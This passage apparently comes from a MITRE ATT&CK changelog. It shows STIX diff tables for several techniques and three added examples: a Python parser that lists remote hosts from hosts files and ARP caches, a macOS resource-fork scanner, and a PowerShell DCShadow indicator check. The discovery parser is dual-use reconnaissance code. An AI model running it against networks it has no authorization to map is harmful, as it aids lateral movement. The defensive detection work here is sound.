| external_references[1]['url'] | https://capec.mitre.org/data/definitions/292.html | https://us-cert.cisa.gov/ncas/analysis-reports/ar21-126a |
| x_mitre_data_sources[0] | Process: Process Creation | Command: Command Execution |
| x_mitre_data_sources[1] | Command: Command Execution | File: File Access |
| x_mitre_data_sources[2] | Network Traffic: Network Connection Creation | Process: Process Creation |
| x_mitre_data_sources[3] | File: File Access | Network Traffic: Network Connection Creation |
| x_mitre_version | 3.2 | 3.4 |
| STIX Field | Old value | New value |
|---|---|---|
| external_references | {'source_name': 'US-CERT-TA18-106A', 'description': 'US-CERT. (2018, April 20). Alert (TA18-106A) Russian State-Sponsored Cyber Actors Targeting Network Infrastructure Devices. Retrieved October 19, 2020.', 'url': 'https://www.us-cert.gov/ncas/alerts/TA18-106A'} | |
| external_references | {'source_name': 'capec', 'url': 'https://capec.mitre.org/data/definitions/292.html', 'external_id': 'CAPEC-292'} | |
| x_mitre_contributors | Austin Clark, @c2defense | |
| x_mitre_platforms | Network |
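The new description for Remote System Discovery adds the passive sources: the hosts file, the local ARP cache, and `show arp` on network devices. The following is an added example (not MITRE's code) that turns those three sources into one list of candidate remote systems, which is the view an adversary assembles before moving laterally and the same parsing a defender needs to baseline them. It goes a little beyond the page in handling both the Linux and Windows `arp -a` dialects as well as the Cisco IOS `show arp` table. All sample outputs are constructed for the demo.

```python
"""Passive remote-system discovery from local artifacts: the hosts file,
the ARP cache as printed by 'arp -a' on Linux or Windows, and the Cisco IOS
'show arp' table. Added example, not MITRE's code. Sample outputs below are
constructed; the parsers only recognise the line formats shown."""
import ipaddress
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class Host:
    ip: str
    name: str = ""
    mac: str = ""
    source: str = ""


def parse_hosts_file(text):
    """hosts(5) lines: <ip> <name> [alias ...], '#' starts a comment."""
    hosts = []
    for line in text.splitlines():
        line = line.split("#", 1)[0].strip()
        if not line:
            continue
        ip, *names = line.split()
        for name in names:
            hosts.append(Host(ip=ip, name=name, source="hosts"))
    return hosts


# Linux:   gw.lan (10.0.5.1) at 00:11:22:33:44:55 [ether] on eth0
LINUX_ARP = re.compile(r"^(\S+)\s+\((\d+\.\d+\.\d+\.\d+)\)\s+at\s+([0-9a-f:]{17})", re.I)
# Windows:   10.0.5.1              00-11-22-33-44-55     dynamic
WIN_ARP = re.compile(r"^\s*(\d+\.\d+\.\d+\.\d+)\s+([0-9a-f]{2}(?:-[0-9a-f]{2}){5})\s+(dynamic|static)", re.I)
# Cisco IOS: Internet  10.0.5.1   -   0011.2233.4455  ARPA   GigabitEthernet0/0
IOS_ARP = re.compile(r"^Internet\s+(\d+\.\d+\.\d+\.\d+)\s+\S+\s+([0-9a-f]{4}\.[0-9a-f]{4}\.[0-9a-f]{4})", re.I)


def parse_arp(text):
    """Accept any of the three ARP dialects; incomplete entries are skipped
    because their MAC field does not match."""
    hosts = []
    for line in text.splitlines():
        if m := LINUX_ARP.match(line):
            name = "" if m.group(1) == "?" else m.group(1)
            hosts.append(Host(ip=m.group(2), name=name, mac=m.group(3).lower(), source="arp"))
        elif m := WIN_ARP.match(line):
            hosts.append(Host(ip=m.group(1), mac=m.group(2).lower().replace("-", ":"), source="arp"))
        elif m := IOS_ARP.match(line):
            raw = m.group(2).lower().replace(".", "")
            mac = ":".join(raw[i:i + 2] for i in range(0, 12, 2))
            hosts.append(Host(ip=m.group(1), mac=mac, source="show arp"))
    return hosts


def merge(*host_lists):
    """Collapse entries per address, keeping the first name and MAC seen.
    Loopback and multicast addresses are dropped; so is x.x.x.255, a
    heuristic for the /24 broadcast entry Windows lists as static."""
    by_ip = {}
    for h in (h for lst in host_lists for h in lst):
        try:
            addr = ipaddress.ip_address(h.ip)
        except ValueError:
            continue
        if addr.is_loopback or addr.is_multicast or h.ip.endswith(".255"):
            continue
        cur = by_ip.get(h.ip)
        by_ip[h.ip] = h if cur is None else Host(
            ip=h.ip, name=cur.name or h.name, mac=cur.mac or h.mac,
            source=cur.source if h.source in cur.source else cur.source + "+" + h.source)
    return sorted(by_ip.values(),
                  key=lambda h: (ipaddress.ip_address(h.ip).version, ipaddress.ip_address(h.ip)))


# Constructed sample artifacts (not captured from a real host).
HOSTS_FILE = """127.0.0.1   localhost
::1         localhost ip6-localhost
# internal jump boxes
10.0.5.10   jump01.corp.example jump01
10.0.5.11   fileserver.corp.example   # NAS
"""
LINUX_ARP_OUT = """gw.lan (10.0.5.1) at 00:11:22:33:44:55 [ether] on eth0
? (10.0.5.11) at aa:bb:cc:dd:ee:01 [ether] on eth0
? (10.0.5.37) at <incomplete> on eth0
"""
WIN_ARP_OUT = """
Interface: 10.0.5.20 --- 0xb
  Internet Address      Physical Address      Type
  10.0.5.1              00-11-22-33-44-55     dynamic
  10.0.5.42             aa-bb-cc-dd-ee-42     dynamic
  10.0.5.255            ff-ff-ff-ff-ff-ff     static
  224.0.0.22            01-00-5e-00-00-16     static
"""
IOS_ARP_OUT = """Protocol  Address          Age (min)  Hardware Addr   Type   Interface
Internet  10.0.5.1                -   0011.2233.4455  ARPA   GigabitEthernet0/0
Internet  10.0.5.60              12   aabb.ccdd.ee60  ARPA   GigabitEthernet0/0
"""


def discover():
    return merge(parse_hosts_file(HOSTS_FILE), parse_arp(LINUX_ARP_OUT),
                 parse_arp(WIN_ARP_OUT), parse_arp(IOS_ARP_OUT))


if __name__ == "__main__":
    for host in discover():
        print(host)
```

None of these reads generates a packet, which is the point of the "passive means" wording: Process Creation and File Access are the only data sources in this entry that will see it, so a defender watching for `ping` sweeps alone misses it.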
| Old Description | New Description |
|---|---|
| Adversaries may move onto systems, possibly those on disconnected or air-gapped networks, by copying malware to removable media and taking advantage of Autorun features when the media is inserted into a system and executes. In the case of Lateral Movement, this may occur through modification of executable files stored on removable media or by copying malware and renaming it to look like a legitimate file to trick users into executing it on a separate system. In the case of Initial Access, this may occur through manual manipulation of the media, modification of systems used to initially format the media, or modification to the media's firmware itself. | Adversaries may move onto systems, possibly those on disconnected or air-gapped networks, by copying malware to removable media and taking advantage of Autorun features when the media is inserted into a system and executes. In the case of Lateral Movement, this may occur through modification of executable files stored on removable media or by copying malware and renaming it to look like a legitimate file to trick users into executing it on a separate system. In the case of Initial Access, this may occur through manual manipulation of the media, modification of systems used to initially format the media, or modification to the media's firmware itself. Mobile devices may also be used to infect PCs with malware if connected via USB.(Citation: Exploiting Smartphone USB ) This infection may be achieved using devices (Android, iOS, etc.) and, in some instances, USB charging cables.(Citation: Windows Malware Infecting Android)(Citation: iPhone Charging Cable Hack) For example, when a smartphone is connected to a system, it may appear to be mounted similar to a USB-connected disk drive. If malware that is compatible with the connected system is on the mobile device, the malware could infect the machine (especially if Autorun features are enabled). |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_contributors | ['Joas Antonio dos Santos, @Cr4zyC0d3'] | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_permissions_required | ['User'] |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-07-20 02:18:04.581000+00:00 | 2022-10-21 19:14:13.179000+00:00 |
| description | Adversaries may move onto systems, possibly those on disconnected or air-gapped networks, by copying malware to removable media and taking advantage of Autorun features when the media is inserted into a system and executes. In the case of Lateral Movement, this may occur through modification of executable files stored on removable media or by copying malware and renaming it to look like a legitimate file to trick users into executing it on a separate system. In the case of Initial Access, this may occur through manual manipulation of the media, modification of systems used to initially format the media, or modification to the media's firmware itself. | Adversaries may move onto systems, possibly those on disconnected or air-gapped networks, by copying malware to removable media and taking advantage of Autorun features when the media is inserted into a system and executes. In the case of Lateral Movement, this may occur through modification of executable files stored on removable media or by copying malware and renaming it to look like a legitimate file to trick users into executing it on a separate system. In the case of Initial Access, this may occur through manual manipulation of the media, modification of systems used to initially format the media, or modification to the media's firmware itself. Mobile devices may also be used to infect PCs with malware if connected via USB.(Citation: Exploiting Smartphone USB ) This infection may be achieved using devices (Android, iOS, etc.) and, in some instances, USB charging cables.(Citation: Windows Malware Infecting Android)(Citation: iPhone Charging Cable Hack) For example, when a smartphone is connected to a system, it may appear to be mounted similar to a USB-connected disk drive. If malware that is compatible with the connected system is on the mobile device, the malware could infect the machine (especially if Autorun features are enabled). |
| x_mitre_version | 1.1 | 1.2 |
| STIX Field | Old value | New value |
|---|---|---|
| external_references | {'source_name': 'Windows Malware Infecting Android', 'description': 'Lucian Constantin. (2014, January 23). Windows malware tries to infect Android devices connected to PCs. Retrieved May 25, 2022.', 'url': 'https://www.computerworld.com/article/2486903/windows-malware-tries-to-infect-android-devices-connected-to-pcs.html'} | |
| external_references | {'source_name': 'iPhone Charging Cable Hack', 'description': 'Zack Whittaker. (2019, August 12). This hacker’s iPhone charging cable can hijack your computer. Retrieved May 25, 2022.', 'url': 'https://techcrunch.com/2019/08/12/iphone-charging-cable-hack-computer-def-con/'} | |
| external_references | {'source_name': 'Exploiting Smartphone USB ', 'description': 'Zhaohui Wang & Angelos Stavrou. (n.d.). Exploiting Smart-Phone USB Connectivity For Fun And Profit. Retrieved May 25, 2022.', 'url': 'https://citeseerx.ist.psu.edu/viewdoc/download?doi=10.1.1.226.3427&rep=rep1&type=pdf'} | |
| x_mitre_data_sources | File: File Creation |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_data_sources | File: File Creation |
| Description |
|---|
| Adversaries may abuse resource forks to hide malicious code or executables to evade detection and bypass security applications. A resource fork provides applications a structured way to store resources such as thumbnail images, menu definitions, icons, dialog boxes, and code.(Citation: macOS Hierarchical File System Overview) Usage of a resource fork is identifiable when displaying a file’s extended attributes, using ls -l@ or xattr -l commands. Resource forks have been deprecated and replaced with the application bundle structure. Non-localized resources are placed at the top level directory of an application bundle, while localized resources are placed in the /Resources folder.(Citation: Resource and Data Forks)(Citation: ELC Extended Attributes) Adversaries can use resource forks to hide malicious data that may otherwise be stored directly in files. Adversaries can execute content with an attached resource fork, at a specified offset, that is moved to an executable location then invoked. Resource fork content may also be obfuscated/encrypted until execution.(Citation: sentinellabs resource named fork 2020)(Citation: tau bundlore erika noerenberg 2020) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_permissions_required | ['User'] |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-10-16 01:50:40.276000+00:00 | 2022-05-05 05:10:23.890000+00:00 |
| external_references[1]['source_name'] | macOS Hierarchical File System Overview | tau bundlore erika noerenberg 2020 |
| external_references[1]['description'] | Tenon. (n.d.). Retrieved October 12, 2021. | Erika Noerenberg. (2020, June 29). TAU Threat Analysis: Bundlore (macOS) mm-install-macos. Retrieved October 12, 2021. |
| external_references[1]['url'] | http://tenon.com/products/codebuilder/User_Guide/6_File_Systems.html#anchor520553 | https://blogs.vmware.com/security/2020/06/tau-threat-analysis-bundlore-macos-mm-install-macos.html |
| external_references[5]['source_name'] | tau bundlore erika noerenberg 2020 | macOS Hierarchical File System Overview |
| external_references[5]['description'] | Erika Noerenberg. (2020, June 29). TAU Threat Analysis: Bundlore (macOS) mm-install-macos. Retrieved October 12, 2021. | Tenon. (n.d.). Retrieved October 12, 2021. |
| external_references[5]['url'] | https://blogs.vmware.com/security/2020/06/tau-threat-analysis-bundlore-macos-mm-install-macos.html | http://tenon.com/products/codebuilder/User_Guide/6_File_Systems.html#anchor520553 |
| x_mitre_defense_bypassed[0] | Notarization; Gatekeeper | Notarization |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_data_sources | Command: Command Execution | |
| x_mitre_defense_bypassed | Gatekeeper |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_data_sources | Command: Command Execution |
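The description above says a resource fork is visible through `ls -l@` or `xattr -l` and that the hidden payload may sit at an offset inside the fork. The following is an added example (not MITRE's code) of a scanner that does the same check programmatically: it reads each file's resource fork and reports the lowest offset at which a Mach-O header appears. On macOS the fork is readable through the `/..namedfork/rsrc` path suffix; because that only exists there, the fork reader is a parameter, and the usage at the bottom drives the logic with constructed fork contents.

```python
"""Scan files for a macOS resource fork and look inside it for a Mach-O
header at any offset, which is the hidden-executable case described above.
Added example, not MITRE's code. On macOS a file's resource fork is readable
through the path suffix '/..namedfork/rsrc'; the reader is a parameter so
the logic can also run elsewhere against the constructed fork contents at
the bottom, which is what demo() does."""
import os

# Mach-O magics in both byte orders, 32- and 64-bit, plus the fat/universal
# header 0xCAFEBABE (Java class files share it, so treat that one as a hint).
MACHO_MAGICS = (b"\xfe\xed\xfa\xce", b"\xce\xfa\xed\xfe",
                b"\xfe\xed\xfa\xcf", b"\xcf\xfa\xed\xfe", b"\xca\xfe\xba\xbe")


def read_fork_darwin(path):
    """Return the resource fork bytes, or b'' when the file has none."""
    try:
        with open(path + "/..namedfork/rsrc", "rb") as fh:
            return fh.read()
    except OSError:
        return b""


def macho_offset(blob):
    """Lowest offset at which a Mach-O magic appears, or None if absent.
    Obfuscated or encrypted fork content (which the page notes is common)
    will not show a magic, so None is not a clean bill of health."""
    hits = [i for i in (blob.find(m) for m in MACHO_MAGICS) if i >= 0]
    return min(hits) if hits else None


def scan_for_resource_forks(paths, read_fork=read_fork_darwin):
    """One finding per file that carries a non-empty resource fork."""
    findings = []
    for p in paths:
        fork = read_fork(p)
        if not fork:
            continue
        findings.append({"path": p, "fork_bytes": len(fork),
                         "macho_offset": macho_offset(fork)})
    return findings


def walk(root):
    """All regular file paths under root, for use with the default reader."""
    for d, _, files in os.walk(root):
        for f in files:
            yield os.path.join(d, f)


# Constructed stand-in for fork contents (not real files): a helper whose
# fork holds a 64-bit little-endian Mach-O header 16 bytes in, an icon with
# a small benign fork, and a text file with no fork at all.
FAKE_FORKS = {
    "/Volumes/Installer/Installer.app/Contents/MacOS/helper":
        b"\x00" * 16 + b"\xcf\xfa\xed\xfe" + b"\x00" * 48,
    "/Volumes/Installer/icon.png": b"\x00" * 8,
    "/Volumes/Installer/readme.txt": b"",
}


def demo():
    return scan_for_resource_forks(sorted(FAKE_FORKS),
                                   read_fork=lambda p: FAKE_FORKS.get(p, b""))


if __name__ == "__main__":
    for finding in demo():
        print(finding)
```

On a real Mac, `scan_for_resource_forks(walk("/Applications"))` uses the default reader. A large fork on a file that has no business carrying one is itself the signal; confirm with `xattr -l <file>`, which lists `com.apple.ResourceFork` alongside any `com.apple.quarantine` attribute that tells you whether Gatekeeper ever saw the file.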
| Old Description | New Description |
|---|---|
| Adversaries may leverage the resources of co-opted systems in order to solve resource intensive problems which may impact system and/or hosted service availability. One common purpose for Resource Hijacking is to validate transactions of cryptocurrency networks and earn virtual currency. Adversaries may consume enough system resources to negatively impact and/or cause affected machines to become unresponsive.(Citation: Kaspersky Lazarus Under The Hood Blog 2017) Servers and cloud-based(Citation: CloudSploit - Unused AWS Regions) systems are common targets because of the high potential for available resources, but user endpoint systems may also be compromised and used for Resource Hijacking and cryptocurrency mining. Containerized environments may also be targeted due to the ease of deployment via exposed APIs and the potential for scaling mining activities by deploying or compromising multiple containers within an environment or cluster.(Citation: Unit 42 Hildegard Malware)(Citation: Trend Micro Exposed Docker APIs) Additionally, some cryptocurrency mining malware kills off processes for competing malware to ensure it’s not competing for resources.(Citation: Trend Micro War of Crypto Miners) | Adversaries may leverage the resources of co-opted systems in order to solve resource intensive problems, which may impact system and/or hosted service availability. One common purpose for Resource Hijacking is to validate transactions of cryptocurrency networks and earn virtual currency. 
Adversaries may consume enough system resources to negatively impact and/or cause affected machines to become unresponsive.(Citation: Kaspersky Lazarus Under The Hood Blog 2017) Servers and cloud-based systems are common targets because of the high potential for available resources, but user endpoint systems may also be compromised and used for Resource Hijacking and cryptocurrency mining.(Citation: CloudSploit - Unused AWS Regions) Containerized environments may also be targeted due to the ease of deployment via exposed APIs and the potential for scaling mining activities by deploying or compromising multiple containers within an environment or cluster.(Citation: Unit 42 Hildegard Malware)(Citation: Trend Micro Exposed Docker APIs) Additionally, some cryptocurrency mining malware identify then kill off processes for competing malware to ensure it’s not competing for resources.(Citation: Trend Micro War of Crypto Miners) Adversaries may also use malware that leverages a system's network bandwidth as part of a botnet in order to facilitate [Network Denial of Service](https://attack.mitre.org/techniques/T1498) campaigns and/or to seed malicious torrents.(Citation: GoBotKR) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_permissions_required | ['User', 'Administrator'] |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-04-14 12:06:32.187000+00:00 | 2022-04-18 20:16:44.560000+00:00 |
| description | Adversaries may leverage the resources of co-opted systems in order to solve resource intensive problems which may impact system and/or hosted service availability. One common purpose for Resource Hijacking is to validate transactions of cryptocurrency networks and earn virtual currency. Adversaries may consume enough system resources to negatively impact and/or cause affected machines to become unresponsive.(Citation: Kaspersky Lazarus Under The Hood Blog 2017) Servers and cloud-based(Citation: CloudSploit - Unused AWS Regions) systems are common targets because of the high potential for available resources, but user endpoint systems may also be compromised and used for Resource Hijacking and cryptocurrency mining. Containerized environments may also be targeted due to the ease of deployment via exposed APIs and the potential for scaling mining activities by deploying or compromising multiple containers within an environment or cluster.(Citation: Unit 42 Hildegard Malware)(Citation: Trend Micro Exposed Docker APIs) Additionally, some cryptocurrency mining malware kills off processes for competing malware to ensure it’s not competing for resources.(Citation: Trend Micro War of Crypto Miners) | Adversaries may leverage the resources of co-opted systems in order to solve resource intensive problems, which may impact system and/or hosted service availability. One common purpose for Resource Hijacking is to validate transactions of cryptocurrency networks and earn virtual currency. 
Adversaries may consume enough system resources to negatively impact and/or cause affected machines to become unresponsive.(Citation: Kaspersky Lazarus Under The Hood Blog 2017) Servers and cloud-based systems are common targets because of the high potential for available resources, but user endpoint systems may also be compromised and used for Resource Hijacking and cryptocurrency mining.(Citation: CloudSploit - Unused AWS Regions) Containerized environments may also be targeted due to the ease of deployment via exposed APIs and the potential for scaling mining activities by deploying or compromising multiple containers within an environment or cluster.(Citation: Unit 42 Hildegard Malware)(Citation: Trend Micro Exposed Docker APIs) Additionally, some cryptocurrency mining malware identify then kill off processes for competing malware to ensure it’s not competing for resources.(Citation: Trend Micro War of Crypto Miners) Adversaries may also use malware that leverages a system's network bandwidth as part of a botnet in order to facilitate [Network Denial of Service](https://attack.mitre.org/techniques/T1498) campaigns and/or to seed malicious torrents.(Citation: GoBotKR) |
| external_references[1]['source_name'] | Kaspersky Lazarus Under The Hood Blog 2017 | Unit 42 Hildegard Malware |
| external_references[1]['description'] | GReAT. (2017, April 3). Lazarus Under the Hood. Retrieved April 17, 2019. | Chen, J. et al. (2021, February 3). Hildegard: New TeamTNT Cryptojacking Malware Targeting Kubernetes. Retrieved April 5, 2021. |
| external_references[1]['url'] | https://securelist.com/lazarus-under-the-hood/77908/ | https://unit42.paloaltonetworks.com/hildegard-malware-teamtnt/ |
| external_references[3]['source_name'] | Unit 42 Hildegard Malware | Kaspersky Lazarus Under The Hood Blog 2017 |
| external_references[3]['description'] | Chen, J. et al. (2021, February 3). Hildegard: New TeamTNT Cryptojacking Malware Targeting Kubernetes. Retrieved April 5, 2021. | GReAT. (2017, April 3). Lazarus Under the Hood. Retrieved April 17, 2019. |
| external_references[3]['url'] | https://unit42.paloaltonetworks.com/hildegard-malware-teamtnt/ | https://securelist.com/lazarus-under-the-hood/77908/ |
| x_mitre_data_sources[0] | Process: Process Creation | Network Traffic: Network Traffic Flow |
| x_mitre_data_sources[1] | Command: Command Execution | Network Traffic: Network Connection Creation |
| x_mitre_data_sources[3] | Network Traffic: Network Connection Creation | Sensor Health: Host Status |
| x_mitre_data_sources[4] | Network Traffic: Network Traffic Flow | Command: Command Execution |
| x_mitre_data_sources[5] | Sensor Health: Host Status | Process: Process Creation |
| x_mitre_version | 1.2 | 1.3 |
| STIX Field | Old value | New value |
|---|---|---|
| external_references | {'source_name': 'GoBotKR', 'description': 'Zuzana Hromcová. (2019, July 8). Malicious campaign targets South Korean users with backdoor‑laced torrents. Retrieved March 31, 2022.', 'url': 'https://www.welivesecurity.com/2019/07/08/south-korean-users-backdoor-torrents/'} |
| Description |
|---|
| Adversaries may register a rogue Domain Controller to enable manipulation of Active Directory data. DCShadow may be used to create a rogue Domain Controller (DC). DCShadow is a method of manipulating Active Directory (AD) data, including objects and schemas, by registering (or reusing an inactive registration) and simulating the behavior of a DC. (Citation: DCShadow Blog) Once registered, a rogue DC may be able to inject and replicate changes into AD infrastructure for any domain object, including credentials and keys. Registering a rogue DC involves creating a new server and nTDSDSA objects in the Configuration partition of the AD schema, which requires Administrator privileges (either Domain or local to the DC) or the KRBTGT hash. (Citation: Adsecurity Mimikatz Guide) This technique may bypass system logging and security monitors such as security information and event management (SIEM) products (since actions taken on a rogue DC may not be reported to these sensors). (Citation: DCShadow Blog) The technique may also be used to alter and delete replication and other associated metadata to obstruct forensic analysis. Adversaries may also utilize this technique to perform [SID-History Injection](https://attack.mitre.org/techniques/T1134/005) and/or manipulate AD objects (such as accounts, access control lists, schemas) to establish backdoors for Persistence. (Citation: DCShadow Blog) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-02-09 15:13:27.670000+00:00 | 2022-03-08 21:20:04.850000+00:00 |
| x_mitre_data_sources[1] | Active Directory: Active Directory Object Modification | User Account: User Account Authentication |
| x_mitre_data_sources[3] | User Account: User Account Authentication | Active Directory: Active Directory Object Modification |
| x_mitre_detection | Monitor and analyze network traffic associated with data replication (such as calls to DrsAddEntry, DrsReplicaAdd, and especially GetNCChanges) between DCs as well as to/from non DC hosts. (Citation: GitHub DCSYNCMonitor) (Citation: DCShadow Blog) DC replication will naturally take place every 15 minutes but can be triggered by an attacker or by legitimate urgent changes (ex: passwords). Also consider monitoring and alerting on the replication of AD objects (Audit Detailed Directory Service Replication Events 4928 and 4929). (Citation: DCShadow Blog) Leverage AD directory synchronization (DirSync) to monitor changes to directory state using AD replication cookies. (Citation: Microsoft DirSync) (Citation: ADDSecurity DCShadow Feb 2018) Baseline and periodically analyze the Configuration partition of the AD schema and alert on creation of nTDSDSA objects. (Citation: DCShadow Blog) Investigate usage of Kerberos Service Principal Names (SPNs), especially those associated with services (beginning with “GC/”) by computers not present in the DC organizational unit (OU). The SPN associated with the Directory Replication Service (DRS) Remote Protocol interface (GUID E3514235–4B06–11D1-AB04–00C04FC2DCD2) can be set without logging. (Citation: ADDSecurity DCShadow Feb 2018) A rogue DC must authenticate as a service using these two SPNs for the replication process to successfully complete. | Monitor and analyze network traffic associated with data replication (such as calls to DrsAddEntry, DrsReplicaAdd, and especially GetNCChanges) between DCs as well as to/from non DC hosts. (Citation: GitHub DCSYNCMonitor) (Citation: DCShadow Blog) DC replication will naturally take place every 15 minutes but can be triggered by an adversary or by legitimate urgent changes (ex: passwords). Also consider monitoring and alerting on the replication of AD objects (Audit Detailed Directory Service Replication Events 4928 and 4929). 
(Citation: DCShadow Blog) Leverage AD directory synchronization (DirSync) to monitor changes to directory state using AD replication cookies. (Citation: Microsoft DirSync) (Citation: ADDSecurity DCShadow Feb 2018) Baseline and periodically analyze the Configuration partition of the AD schema and alert on creation of nTDSDSA objects. (Citation: DCShadow Blog) Investigate usage of Kerberos Service Principal Names (SPNs), especially those associated with services (beginning with “GC/”) by computers not present in the DC organizational unit (OU). The SPN associated with the Directory Replication Service (DRS) Remote Protocol interface (GUID E3514235–4B06–11D1-AB04–00C04FC2DCD2) can be set without logging. (Citation: ADDSecurity DCShadow Feb 2018) A rogue DC must authenticate as a service using these two SPNs for the replication process to successfully complete. |
| x_mitre_version | 2.0 | 2.1 |
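A defender's baseline check for two of the indicators in the detection text above: nTDSDSA objects in the Configuration partition whose server object does not map back to a computer in the Domain Controllers OU, and the "GC/" and DRS-interface SPNs held by computers outside that OU. This is an added example, not MITRE's, and assumes the RSAT ActiveDirectory module on a domain-joined host; the `serverReference` link from a server object to its computer account is from the AD schema, not from the page.

```powershell
# Added example (not from the ATT&CK page): baseline nTDSDSA registrations and
# replication-related SPNs against the Domain Controllers OU. Requires the RSAT
# ActiveDirectory module; default domain-user read access to the Configuration
# partition is sufficient.
Import-Module ActiveDirectory -ErrorAction Stop

function Get-DCShadowIndicators {
    [CmdletBinding()]
    param()

    $rootDse  = Get-ADRootDSE
    $domainDN = $rootDse.defaultNamingContext
    $configNC = $rootDse.configurationNamingContext

    # Known-good set: computer accounts that actually live in the DC OU.
    $dcOu     = "OU=Domain Controllers,$domainDN"
    $legitDcs = Get-ADComputer -SearchBase $dcOu -Filter * |
        ForEach-Object { $_.DistinguishedName.ToLowerInvariant() }

    $findings = @()

    # 1. Every nTDSDSA ("NTDS Settings") object sits under a server object in
    #    CN=Sites. That server object's serverReference attribute names the DC's
    #    computer account. An nTDSDSA with no reference, or one pointing at a
    #    computer outside the DC OU, is what a rogue DC registration looks like.
    $dsas = Get-ADObject -SearchBase $configNC -LDAPFilter '(objectClass=nTDSDSA)'
    foreach ($dsa in $dsas) {
        # Parent DN: drop the leading "CN=NTDS Settings," component.
        $serverDN = ($dsa.DistinguishedName -split ',', 2)[1]
        $server   = Get-ADObject -Identity $serverDN -Properties serverReference
        $ref      = [string]$server.serverReference
        if (-not $ref) {
            $findings += [pscustomobject]@{
                Indicator = 'nTDSDSA without serverReference'
                Object    = $dsa.DistinguishedName
                Detail    = $serverDN
            }
        } elseif ($legitDcs -notcontains $ref.ToLowerInvariant()) {
            $findings += [pscustomobject]@{
                Indicator = 'nTDSDSA references a computer outside the DC OU'
                Object    = $dsa.DistinguishedName
                Detail    = $ref
            }
        }
    }

    # 2. SPNs only a DC should hold: the Global Catalog prefix "GC/" and the
    #    DRS Remote Protocol interface GUID named in the detection text.
    $drsGuid    = 'E3514235-4B06-11D1-AB04-00C04FC2DCD2'
    $spnFilter  = "(|(servicePrincipalName=GC/*)(servicePrincipalName=$drsGuid/*))"
    $spnHolders = Get-ADComputer -LDAPFilter $spnFilter -Properties servicePrincipalName
    foreach ($c in $spnHolders) {
        if ($legitDcs -contains $c.DistinguishedName.ToLowerInvariant()) { continue }
        $suspect = $c.servicePrincipalName |
            Where-Object { $_ -like 'GC/*' -or $_ -like "$drsGuid/*" }
        $findings += [pscustomobject]@{
            Indicator = 'DC-only SPN on a computer outside the DC OU'
            Object    = $c.DistinguishedName
            Detail    = ($suspect -join '; ')
        }
    }

    return $findings
}

# An empty result is the expected state in a healthy forest.
Get-DCShadowIndicators | Format-Table -AutoSize -Wrap
```

Run it on a schedule and diff the output against the previous run; the detection text notes the DRS SPN can be set without logging, so a periodic baseline is the compensating control.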
| Description |
|---|
| Adversaries may use rootkits to hide the presence of programs, files, network connections, services, drivers, and other system components. Rootkits are programs that hide the existence of malware by intercepting/hooking and modifying operating system API calls that supply system information. (Citation: Symantec Windows Rootkits) Rootkits or rootkit enabling functionality may reside at the user or kernel level in the operating system or lower, to include a hypervisor, Master Boot Record, or [System Firmware](https://attack.mitre.org/techniques/T1542/001). (Citation: Wikipedia Rootkit) Rootkits have been seen for Windows, Linux, and Mac OS X systems. (Citation: CrowdStrike Linux Rootkit) (Citation: BlackHat Mac OSX Rootkit) |
New Detections:
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 | |
| external_references | Kurtz, G. (2012, November 19). HTTP iframe Injecting Linux Rootkit. Retrieved December 21, 2017. | |
| external_references | CAPEC-552 |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_permissions_required | ['Administrator', 'SYSTEM', 'root'] | |
| external_references | CAPEC-552 | |
| external_references | Pan, M., Tsai, S. (2014). You can’t see me: A Mac OS X Rootkit uses the tricks you haven't known yet. Retrieved December 21, 2017. |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2020-06-20 22:29:55.496000+00:00 | 2022-05-05 05:09:39.723000+00:00 |
| external_references[1]['source_name'] | capec | CrowdStrike Linux Rootkit |
| external_references[1]['url'] | https://capec.mitre.org/data/definitions/552.html | https://www.crowdstrike.com/blog/http-iframe-injecting-linux-rootkit/ |
| external_references[2]['source_name'] | Symantec Windows Rootkits | BlackHat Mac OSX Rootkit |
| external_references[2]['description'] | Symantec. (n.d.). Windows Rootkit Overview. Retrieved December 21, 2017. | Pan, M., Tsai, S. (2014). You can’t see me: A Mac OS X Rootkit uses the tricks you haven't known yet. Retrieved December 21, 2017. |
| external_references[2]['url'] | https://www.symantec.com/avcenter/reference/windows.rootkit.overview.pdf | http://www.blackhat.com/docs/asia-14/materials/Tsai/WP-Asia-14-Tsai-You-Cant-See-Me-A-Mac-OS-X-Rootkit-Uses-The-Tricks-You-Havent-Known-Yet.pdf |
| external_references[3]['source_name'] | Wikipedia Rootkit | Symantec Windows Rootkits |
| external_references[3]['description'] | Wikipedia. (2016, June 1). Rootkit. Retrieved June 2, 2016. | Symantec. (n.d.). Windows Rootkit Overview. Retrieved December 21, 2017. |
